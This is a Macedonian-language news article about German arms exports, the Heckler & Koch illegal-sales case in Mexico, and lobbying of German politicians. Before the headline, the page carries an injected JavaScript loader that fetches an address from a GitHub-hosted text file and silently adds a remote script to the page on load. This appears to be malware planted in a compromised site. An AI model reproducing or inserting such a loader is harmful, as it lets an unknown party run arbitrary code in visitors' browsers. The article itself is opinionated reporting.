;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Војни за профит: Крвавата тајна на Германија - Антропол
АктуелноЛокално

Војни за профит: Крвавата тајна на Германија

Германските пари, германските оружја убиваат насекаде низ светот.


Забелешка: за снимањето на оваа сторија, сите инволвирани германски владини преставници одбиле да дадат коментар. Целото видео е приложено на крајот од текстот.

Иако Германија важи за една од најдемократските и најслободните држави, германската влада крие тајна. Всушност, Германија е четвртиот најголем извозник на оружје во светот. Оружјето произведено во Германија често завршува во држави чии влади се познати по нивните брутални методи на репресија, односно тенкови од германско производство се употребуваат од страна на турската влада во бруталната војна против Курдите, а дел од нападите во Јемен (каде моментално владее најлошата хуманитарна катастрофа) се директно извршени со германско оружје.

Дека јавноста во Германија станува се погласна против лицемерието на својата влада, зборува и тужбата против германската компанијата „Хеклер и Кох”, која е една од најголемите компании за производство на оружје. Оваа  компанија е само еден пример за врските кои постојат помеѓу германската влада и државите кои се најголеми купувачи на оружје. Во 2009 година, еден од вработените во оваа компанија контактира активисти кои се борат против воената индустрија, при што им откри еден од многуте валкани договори на оваа компанија: помеѓу 2006 и 2009 година оваа компанија нелегално испорачала 7000 парчиња оружје во конфликтните зони во Мексико. Ова тврдење вработениот во компанијата го покрепи и со документација која претставува дел од судскиот процес против „Хеклер и Кох”, каде шест поранешни вработени (вклучително и директор на компанијата) се обвинети за нелегална трговија со оружје.

Оружје произведено од оваа компанија беше пронајдено во трагедија која го шокира светот. Во 2014 година, 43 студенти во Мексико беа убиени како колатерална штета во крвавата војна со дрога, кога беа киднапирани од корумпиран полицаец и беа предадени на еден од најсилните мексикански картели. Неколку од тие студенти беа убиени со оружје произведено од „Хеклер и Кох”. Дел од мексиканските студенти се уште тврдат дека позади ова злосторство стои директно државата и дека токму армијата ја координирала целата операција. Еден од мексиканските студенти после оваа трагедија изјави: „Од ваквите злосторства во Мексико профитираат елитите, кои очигледно ги создаваат овие картели за трговија со дрога, додека луѓето од пониските слоеви, претставуваат само колатерална штета за нив.”

Иако Германија нема воведено забрана за трговија со оружје со Мексико, сепак постои ригорозна легислатива која ја регулира трговијата. Продажбата мора да биде одобрена од германската влада, и производителите мора да докажат дека оружјето нема да заврши во зони кои се опфатени со војните за дрога, како регионот каде студентите беа убиени. Иако компанијата „Хеклер и Кох” тврдеа дека оружјето било продадено во легална постапка во мирен регион на Мексико, откако започна војната за дрога во 2006 година, во Мексико владее висока корупција и беззаконие, факт кој сигурно е познат на германската влада и на „Хеклер и Кох”. Тука се поставува прашањето: како оваа компанија добила дозвола за продажба на оружје во Мексико?

Интерни маилови на компанијата покажаа дека поранешниот директор советувал компанијата да дели донации на влијатeлни германски политичари, дел од нив силни поддржувачи на германската воена индустрија, преку што за возврат обезбедувале дозволи за продажба на оружје.  Огромни суми на донации од бизнис лобито често се преливаат на сметките на германските политичари, поради што активистите често предупредуваат дека овие политичари не се независни при носењето нa нивните одлуки. Еден од вклучените во случајот против „Хеклер и Кох” ќе изјави: „Дел од нашите политичари се марионети во рацете на германската воена индустрија кои носат одлуки во нивна корист.”

„Во Германија си слободен да кажеш било што, се додека тоа не ја напаѓа нелегалната трговија со оружје.” – вака еден од активистите во случајот против „Хеклер и Кох” ќе го оцени огромното влијание кое воената индустрија го има врз политичкиот живот. Дури и во малиот германски град, Обендорф, каде оваа компанија е лоцирана, жителите најчесто избегнуваат да зборуваат со новинарите, затоа што сметаат дека моќта која ја поседува „Хеклер и Кох” е премногу голема. Оваа појава воопшто не е случајност, ако се има во предвид дека еден од вработените „свиркачи” во компанијата ја изгуби фамилијата и беше приморан да ја напушти државата поради страв од закани. За моќта и валканото работење на оваа компанија говорат и нападите врз новинарски екипи кои го истражуваат нејзиното работење, од страна на највисоките претставници на компанијата. Но, оваа агресија е потполна очекувана од моќници кои профитираат од војни, смрт и терор врз сиромашните земји.   

Иако Германија ја има една од најригорозните регулативи за производство и трговија со оружје, практиката покажува дека трговијата со оружје е премногу слободна: Германија секогаш се јавува на трето или четврто место во трговијата со оружје, некогаш дури и на второ место кога се однесува за трговија со мало оружје. Една од причините е тоа што средбите каде се одлучува за издавање дозволи за трговија со оружје, во кои директно е вклучен и германскиот канцелар, се тајни и недостапни за јавноста, што лесно ги прави подобни за корупција. Другата причина е што владата предводена од Меркел активно водеше политика на масовно продавање оружје и опремување на војската во други земји, реформи кои дури добија назив како Меркелова доктрина. Ова се покажа како успешна стратегија за сите германски политички партии: политичкото влијанието на Германија во глобалниот свет остана силно, додека германската воена индустрија профитира од тоа. Воедно германската влада не е приморана директно да учествува во надворешни конфликти, со што го задржува својот имиџ на мирољубива, прогресивна земја.

Од 2014 година, кога новата коалиција ја освои власта во Германија, индустријата за производство и трговија со оружје остварила енормен профит од 18 милијарди евра, информација која предизвика гнев во германската јавност. Поради ова еден германски активист ќе изјави „Ова е систем на масовни убиства, извршени во име на германската влада. Ова е неверојатно за демократија како оваа земја.”